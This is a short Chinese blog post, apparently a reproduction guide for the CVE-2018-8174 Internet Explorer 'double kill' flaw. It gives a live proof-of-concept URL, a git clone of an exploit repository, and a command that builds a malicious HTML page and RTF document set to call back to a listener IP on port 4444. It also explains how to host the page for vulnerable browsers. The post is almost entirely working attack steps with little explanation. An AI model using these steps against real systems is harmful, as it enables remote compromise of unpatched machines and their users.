CVE-2018-8174 IE双杀漏洞复现

漏洞测试地址:

未打补丁系统,IE浏览器打开此地址会弹出计算器 。

http://test.lr3800.com/CVE-2018-8174_PoC.html

下载exp:
git clone https://github.com/Sch01ar/CVE-2018-8174_EXP .git

使用命令:
python CVE-2018-8174.py -u http://192.168.10.142/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444

-u:URL 地址

-o:生成文档

-i:监听地址

-p:监听端口

会在命令目录下生成 一个 exploit.html 文件 ,将它放在 http://192.168.10.142 服务器根目录,使用带有漏洞的ie访问

参考链接:
https://www.freebuf.com/vuls/173727.html

https://www.cnblogs.com/sch01ar/p/9175578.html

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Loading...